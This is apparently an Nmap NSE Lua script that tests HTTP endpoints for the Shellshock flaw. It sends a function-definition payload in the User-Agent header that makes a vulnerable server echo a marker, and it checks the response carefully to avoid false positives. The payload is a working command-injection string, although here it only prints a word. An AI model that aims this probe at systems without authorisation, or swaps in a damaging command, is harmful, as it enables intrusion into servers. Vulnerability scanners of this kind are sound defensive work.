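--- Nmap NSE script: checks whether an HTTP endpoint evaluates a Shellshock
-- style function definition supplied in the User-Agent header.
--
-- Script argument:
--   url  path to request on the target (defaults to "/" when omitted).
--
-- The result is a one-line string naming the host, port and path and
-- stating whether the marker emitted by the probe appeared in the response.

local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"

-- The probe asks the target to run a command, so the script is labelled
-- intrusive; that keeps it out of scans limited to the "safe" category.
categories = {"vuln", "intrusive"}

-- Text the probe asks the target to print. It must match the word echoed by
-- the payload below.
local MARKER = "VULN"

--- Send the probe and decide whether the target executed it.
-- @param host NSE host table.
-- @param port NSE port table.
-- @param url  Path to request.
-- @return true when the marker appears at the start of a line in the
--         response body, false otherwise (including when no response or no
--         body was received).
local function check(host, port, url)
  local payload = "() { :; }; echo; echo VULN"
  local response = http.get(host, port, url, { ["header"] = { ["User-Agent"] = payload } })

  local body = response and response.body
  if type(body) ~= "string" then
    return false
  end

  -- A page that merely reflects the User-Agent header contains "echo VULN",
  -- where the marker follows a space. Output produced by executing the
  -- payload puts the marker at the start of a line, so only that form is
  -- accepted; this avoids reporting header-echoing pages as vulnerable.
  if body:find("^" .. MARKER) then
    return true
  end
  return body:find("\n" .. MARKER, 1, true) ~= nil
end

portrule = shortport.http

--- NSE entry point: probe the configured path and report the verdict.
-- @param host NSE host table.
-- @param port NSE port table.
-- @return Human-readable result line.
action = function(host, port)
  -- Without the argument the original passed nil as the request path.
  local url = stdnse.get_script_args("url") or "/"
  local vulnerable = check(host, port, url)

  -- The format string supplies the slash between port and path, so drop a
  -- leading one from the displayed value. Parentheses discard gsub's count.
  local shown = (url:gsub("^/", ""))

  return string.format(
    "Host %s:%s/%s is%s vulnerable to Shellshock",
    host.ip, port.number, shown, vulnerable and "" or " NOT"
  )
end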